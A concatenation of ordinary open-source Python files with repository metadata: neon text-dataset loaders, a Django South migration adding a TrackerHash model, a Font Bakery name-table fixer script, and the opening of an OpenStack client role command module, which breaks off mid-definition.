self.filemap = {'train': 5101618,
'test': 449945,
'valid': 399782}
keys = list(self.filemap.keys())
filenames = [self.gen_filename(phase) for phase in keys]
sizes = [self.filemap[phase] for phase in keys]
super(PTB, self).__init__(filenames,
url,
sizes,
path=path)
self.timesteps = timesteps
self.onehot_input = onehot_input
self.tokenizer = tokenizer
if tokenizer is not None:
assert hasattr(self, self.tokenizer)
self.tokenizer_func = getattr(self, self.tokenizer)
else:
self.tokenizer_func = None
self.reverse_target = reverse_target
self.get_prev_target = get_prev_target
@staticmethod
def newline_tokenizer(s):
"""
Tokenizer which breaks on newlines.
Arguments:
s (str): String to tokenize.
Returns:
str: String with "<eos>" in place of newlines.
"""
# replace newlines with '<eos>' so that
# the newlines count as words
return s.replace('\n', '<eos>').split()
@staticmethod
def gen_filename(phase):
"""
Filename generator.
Arguments:
phase(str): Phase
Returns:
string: ptb.<phase>.txt
"""
return 'ptb.%s.txt' % phase
def load_data(self):
self.file_paths = {}
for phase in self.filemap:
fn = self.gen_filename(phase)
size = self.filemap[phase]
self.file_paths[phase] = self.load_zip(fn, size)
return self.file_paths
def gen_iterators(self):
self.load_data()
self._data_dict = {}
self.vocab = None
for phase in ['train', 'test', 'valid']:
file_path = self.file_paths[phase]
            get_prev_target = self.get_prev_target if phase == 'train' else False
self._data_dict[phase] = Text(self.timesteps,
file_path,
tokenizer=self.tokenizer_func,
onehot_input=self.onehot_input,
vocab=self.vocab,
reverse_target=self.reverse_target,
get_prev_target=get_prev_target)
if self.vocab is None:
self.vocab = self._data_dict['train'].vocab
return self._data_dict
class HutterPrize(Dataset):
"""
Hutter Prize data set from http://prize.hutter1.net/
"""
def __init__(self, path='.'):
super(HutterPrize, self).__init__('enwik8.zip',
'http://mattmahoney.net/dc',
35012219,
path=path)
def load_data(self):
self.filepath = self.load_zip(self.filename, self.size)
return self.filepath
class IMDB(Dataset):
"""
    IMDB data set from http://www.aclweb.org/anthology/P11-1015.
"""
def __init__(self, vocab_size, sentence_length, path='.'):
url = 'https://s3.amazonaws.com/text-datasets'
super(IMDB, self).__init__('imdb.pkl',
url,
33213513,
path=path)
self.vocab_size = vocab_size
self.sentence_length = sentence_length
self.filepath = None
def load_data(self):
self.filepath = self.load_zip(self.filename, self.size)
return self.filepath
def gen_iterators(self):
if self.filepath is None:
self.load_data()
data = pad_data(self.filepath, vocab_size=self.vocab_size,
sentence_length=self.sentence_length)
(X_train, y_train), (X_test, y_test), nclass = data
self._data_dict = {'nclass': nclass}
self._data_dict['train'] = ArrayIterator(X_train, y_train, nclass=2)
self._data_dict['test'] = ArrayIterator(X_test, y_test, nclass=2)
return self._data_dict
class SICK(Dataset):
"""
Semantic Similarity dataset from qcri.org (Semeval 2014).
Arguments:
path (str): path to SICK_data directory
"""
def __init__(self, path='SICK_data/'):
url = 'http://alt.qcri.org/semeval2014/task1/data/uploads/'
self.filemap = {'train': 87341,
'test_annotated': 93443,
'trial': 16446}
keys = list(self.filemap.keys())
self.zip_paths = None
self.file_paths = [self.gen_filename(phase) for phase in keys]
self.sizes = [self.filemap[phase] for phase in keys]
super(SICK, self).__init__(filename=self.file_paths,
url=url,
size=self.sizes,
path=path)
@staticmethod
def gen_zipname(phase):
"""
Zip filename generator.
Arguments:
phase(str): Phase of training/evaluation
Returns:
string: sick_<phase>.zip
"""
return "sick_{}.zip".format(phase)
@staticmethod
def gen_filename(phase):
"""
Filename generator for the extracted zip files.
Arguments:
phase(str): Phase of training/evaluation
Returns:
string: SICK_<phase>.txt
"""
return "SICK_{}.txt".format(phase)
def load_data(self):
"""
Conditional data loader will download and extract zip files if not found locally.
"""
self.zip_paths = {}
for phase in self.filemap:
zn = self.gen_zipname(phase)
size = self.filemap[phase]
self.zip_paths[phase] = self.load_zip(zn, size)
return self.zip_paths
def load_eval_data(self):
"""
        Load the SICK semantic-relatedness dataset. Data is a tab-delimited txt file,
        in the format: pairID\tSentenceA\tSentenceB\tScore. Data is downloaded and
        extracted from zip files if not found in the directory specified by self.path.
Returns:
tuple of tuples of np.array: three tuples containing A & B sentences
                for train, dev, and test, along with a fourth tuple containing
the scores for each AB pair.
"""
if self.zip_paths is None:
self.load_data()
trainA, trainB, devA, devB, testA, testB = [], [], [], [], [], []
trainS, devS, testS = [], [], []
with open(self.path + self.gen_filename('train'), 'rb') as f:
for line in f:
text = line.strip().split(b'\t')
trainA.append(text[1])
trainB.append(text[2])
trainS.append(text[3])
with open(self.path + self.gen_filename('trial'), 'rb') as f:
for line in f:
text = line.strip().split(b'\t')
devA.append(text[1])
devB.append(text[2])
devS.append(text[3])
with open(self.path + self.gen_filename('test_annotated'), 'rb') as f:
for line in f:
text = line.strip().split(b'\t')
testA.append(text[1])
testB.append(text[2])
testS.append(text[3])
trainS = [float(s) for s in trainS[1:]]
devS = [float(s) for s in devS[1:]]
testS = [float(s) for s in testS[1:]]
return ((np.array(trainA[1:]), np.array(trainB[1:])),
(np.array(devA[1:]), np.array(devB[1:])),
(np.array(testA[1:]), np.array(testB[1:])),
(np.array(trainS), np.array(devS), np.array(testS)))
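# A minimal usage sketch (hypothetical): load_eval_data() returns the paired
# sentences and gold relatedness scores, with the header row already stripped
# via the [1:] slices above:
#
#   sick = SICK(path='SICK_data/')
#   (trainA, trainB), (devA, devB), (testA, testB), scores = sick.load_eval_data()
#   train_scores, dev_scores, test_scores = scores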
|
NervanaSystems/neon
|
neon/data/text.py
|
Python
|
apache-2.0
| 22,858
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'TrackerHash'
db.create_table(u'issues_trackerhash', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=255)),
('query_string', self.gf('django.db.models.fields.TextField')()),
('query_hash', self.gf('django.db.models.fields.CharField')(unique=True, max_length=255)),
('created', self.gf('django.db.models.fields.DateField')(auto_now_add=True, blank=True)),
('modified', self.gf('django.db.models.fields.DateField')(auto_now=True, null=True, blank=True)),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
))
db.send_create_signal(u'issues', ['TrackerHash'])
def backwards(self, orm):
# Deleting model 'TrackerHash'
db.delete_table(u'issues_trackerhash')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'issues.advancedsearchhash': {
'Meta': {'object_name': 'AdvancedSearchHash'},
'created': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'query': ('django.db.models.fields.TextField', [], {}),
'search_hash': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
},
u'issues.issue': {
'Meta': {'object_name': 'Issue'},
'actual_end': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'actual_start': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'assigned_to': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'assigned_to'", 'null': 'True', 'to': u"orm['auth.User']"}),
'browser': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'browser_version': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'created_by'", 'null': 'True', 'to': u"orm['auth.User']"}),
'criticality': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'date_reported': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'description_type': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'due_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'estimated_time': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'feature': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'fixability': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue_type': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'link_slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'meta_issues': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['issues.MetaIssue']", 'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'modified_by'", 'null': 'True', 'to': u"orm['auth.User']"}),
'os': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'os_version': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'point_of_contact': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'poc'", 'null': 'True', 'to': u"orm['auth.User']"}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['projects.Project']"}),
'projected_end': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'projected_start': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'r_and_d': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'screen_shot': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'sprint': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sprints.Sprint']", 'null': 'True', 'blank': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'summary': ('django.db.models.fields.CharField', [], {'default': "'No Summary'", 'max_length': '140'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'uri_to_test': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'view_type': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'wireframe': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
u'issues.issuecomment': {
'Meta': {'object_name': 'IssueComment'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['issues.Issue']"}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'issues.issuefieldupdate': {
'Meta': {'object_name': 'IssueFieldUpdate'},
'created': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'field': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['issues.Issue']"}),
'new_value': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'old_value': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'issues.issuehistorical': {
'Meta': {'object_name': 'IssueHistorical'},
'actual_end': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'actual_start': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'assigned_to': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'assigned_to_history'", 'null': 'True', 'to': u"orm['auth.User']"}),
'browser': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'browser_version': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'created_by_history'", 'null': 'True', 'to': u"orm['auth.User']"}),
'criticality': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'date_reported': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'due_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'feature': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'fixability': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['issues.Issue']", 'null': 'True', 'blank': 'True'}),
'issue_type': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'link_slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'meta_issues': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['issues.MetaIssue']", 'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateField', [], {'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'modified_by_history'", 'null': 'True', 'to': u"orm['auth.User']"}),
'os': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'os_version': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'point_of_contact': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'poc_history'", 'null': 'True', 'to': u"orm['auth.User']"}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['projects.Project']"}),
'projected_end': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'projected_start': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'r_and_d': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'screen_shot': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'summary': ('django.db.models.fields.CharField', [], {'default': "'No Summary'", 'max_length': '140'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'uri_to_test': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'view_type': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'wireframe': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
u'issues.issuescreenshot': {
'Meta': {'object_name': 'IssueScreenshot'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['issues.Issue']"}),
'screenshot': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'})
},
u'issues.issuestatusupdate': {
'Meta': {'object_name': 'IssueStatusUpdate'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['issues.Issue']"}),
'new_status': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'old_status': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'time_stamp': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'issues.issuetoissue': {
'Meta': {'object_name': 'IssueToIssue'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link_type': ('django.db.models.fields.CharField', [], {'default': "'related'", 'max_length': '255'}),
'primary_issue': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'primary_issue'", 'to': u"orm['issues.Issue']"}),
'secondary_issue': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'secondary_issue'", 'to': u"orm['issues.Issue']"})
},
u'issues.issueview': {
'Meta': {'object_name': 'IssueView'},
'hash_val': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['issues.Issue']"})
},
u'issues.metaissue': {
'Meta': {'object_name': 'MetaIssue'},
'code_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mi_type': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['projects.Project']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'user_story': ('django.db.models.fields.TextField', [], {})
},
u'issues.pinissue': {
'Meta': {'object_name': 'PinIssue'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['issues.Issue']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'issues.projectplanneritem': {
'Meta': {'object_name': 'ProjectPlannerItem'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'item_type': ('django.db.models.fields.CharField', [], {'default': "'meta_issue'", 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'meta_issue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['issues.MetaIssue']"}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['projects.Project']"}),
'x_coordinate': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'y_coordinate': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
u'issues.projectplanneritemconnection': {
'Meta': {'object_name': 'ProjectPlannerItemConnection'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['projects.Project']"}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'source'", 'to': u"orm['issues.ProjectPlannerItem']"}),
'target': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'target'", 'to': u"orm['issues.ProjectPlannerItem']"})
},
u'issues.subscriptiontoissue': {
'Meta': {'object_name': 'SubscriptionToIssue'},
'communication_channel': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'communication_type': ('django.db.models.fields.CharField', [], {'default': "'email'", 'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['issues.Issue']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'issues.trackerhash': {
'Meta': {'object_name': 'TrackerHash'},
'created': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'query_hash': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'query_string': ('django.db.models.fields.TextField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'projects.project': {
'Meta': {'object_name': 'Project'},
'assumptions': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'business_case': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'code_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'current_phase': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'deployment_server': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'deployment_url': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'internal_requests': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'lead_developer': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'lead_developer'", 'null': 'True', 'to': u"orm['auth.User']"}),
'logo': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'phase_planning_end': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'phase_planning_start': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'phase_research_end': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'phase_research_start': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'potential_end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'product_owner': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'product_owner'", 'null': 'True', 'to': u"orm['auth.User']"}),
'project_manager': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'project_manager'", 'null': 'True', 'to': u"orm['auth.User']"}),
'repository_url': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'scope': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
u'sprints.sprint': {
'Meta': {'object_name': 'Sprint'},
'created': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'end': ('django.db.models.fields.DateField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'start': ('django.db.models.fields.DateField', [], {})
}
}
complete_apps = ['issues']
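# To apply this schema migration with South (assuming a standard manage.py
# setup with south in INSTALLED_APPS):
#   python manage.py migrate issues 0036
# and to roll it back (assuming the previous migration is 0035):
#   python manage.py migrate issues 0035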
|
tekton/DocuCanvas
|
issues/migrations/0036_auto__add_trackerhash.py
|
Python
|
gpl-3.0
| 25,990
|
#!/usr/bin/env python
# coding: utf-8
# Copyright 2013 The Font Bakery Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# See AUTHORS.txt for the list of Authors and LICENSE.txt for the License
import argparse
import os
import os.path
from bakery_cli.fixers import FamilyAndStyleNameFixer
description = 'Fixes TTF NAME table naming values to work with Windows GDI'
parser = argparse.ArgumentParser(description=description)
parser.add_argument('ttf_font', nargs='+',
help='Font in OpenType (TTF/OTF) format')
parser.add_argument('--autofix', action='store_true', help='Apply autofix')
args = parser.parse_args()
for path in args.ttf_font:
if not os.path.exists(path):
continue
FamilyAndStyleNameFixer(None, path).apply()
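# Example invocation (hypothetical font paths):
#   fontbakery-fix-opentype-names.py Family-Regular.ttf Family-Bold.ttf --autofix
# Note that as written the --autofix flag is parsed but never consulted:
# FamilyAndStyleNameFixer is applied unconditionally to every path that exists,
# and missing paths are skipped silently.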
|
davelab6/fontbakery
|
tools/fontbakery-fix-opentype-names.py
|
Python
|
apache-2.0
| 1,293
|
# Copyright 2012-2013 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Role action implementations"""
import logging
from cliff import command
from cliff import lister
from cliff import show
from openstackclient.common import utils
class AddRole(show.ShowOne):
"""Add role to tenant:user"""
api = 'identity'
log = logging.getLogger(__name__ + '.AddRole')
def get_parser(self, prog_name):
parser = super(AddRole, self).get_parser(prog_name)
parser.add_argument(
'role',
metavar='<role>',
help='Role name or ID to add to user')
parser.add_argument(
'--tenant',
metavar='<tenant>',
required=True,
help='Name or ID of tenant to include')
parser.add_argument(
'--user',
metavar='<user>',
required=True,
help='Name or ID of user to include')
return parser
def take_action(self, parsed_args):
self.log.debug('take_action(%s)' % parsed_args)
identity_client = self.app.client_manager.identity
role = utils.find_resource(identity_client.roles, parsed_args.role)
tenant = utils.find_resource(identity_client.tenants,
parsed_args.tenant)
user = utils.find_resource(identity_client.users, parsed_args.user)
role = identity_client.roles.add_user_role(
user,
role,
tenant)
info = {}
info.update(role._info)
return zip(*sorted(info.iteritems()))
class CreateRole(show.ShowOne):
"""Create new role"""
api = 'identity'
log = logging.getLogger(__name__ + '.CreateRole')
def get_parser(self, prog_name):
parser = super(CreateRole, self).get_parser(prog_name)
parser.add_argument(
'role_name',
